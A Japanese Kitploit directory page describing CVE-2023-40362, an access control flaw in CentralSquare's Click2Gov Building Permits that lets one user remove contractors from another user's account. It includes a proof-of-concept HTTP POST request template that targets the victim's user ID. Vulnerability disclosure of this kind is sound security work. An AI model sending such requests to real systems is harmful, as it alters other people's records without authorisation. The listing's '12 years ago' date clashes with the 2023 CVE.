Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-40362 — CVE-2023-40362 脆弱性の詳細と概念実証 | Kitploit
ツール/GitHubGitHub/ally-petitt/cve-2023-40362
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubally-petitt/cve-2023-40362

CVE-2023-40362

CVE-2023-40362 脆弱性の詳細と概念実証

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-40362

CVE-2023-40362 脆弱性の詳細と概念実証。

概要

Click2Gov BPのURI /Click2GovBP/mastercontractorlist.htmlにおけるアクセス制御の脆弱性により、認証済みユーザーが被害者のユーザーIDと削除対象の契約業者の情報を用いて、他のユーザーのアカウントから契約業者を削除できるようになります。

これは、指定されたユーザーIDのアカウントから契約業者を削除する権限がユーザーにあるかどうかをWebアプリケーションが検証しないことに起因します。

ベンダー: CentralSquare

報告者: Ally Petitt

発見日: 2023年6月13日

影響を受ける製品: Click2Gov Building Permits (BP)

影響を受けるリリース: 2023年10月より前

CVSS v3: 5.4 - 中程度 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)

概念実証 (PoC)

以下に示すHTTP POSTリクエストを送信することで、被害者のアカウントから契約業者を削除できます。これを機能させるにはCSRFトークンが有効である必要があります。

root@kitploit:~
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>
ツールをダウンロード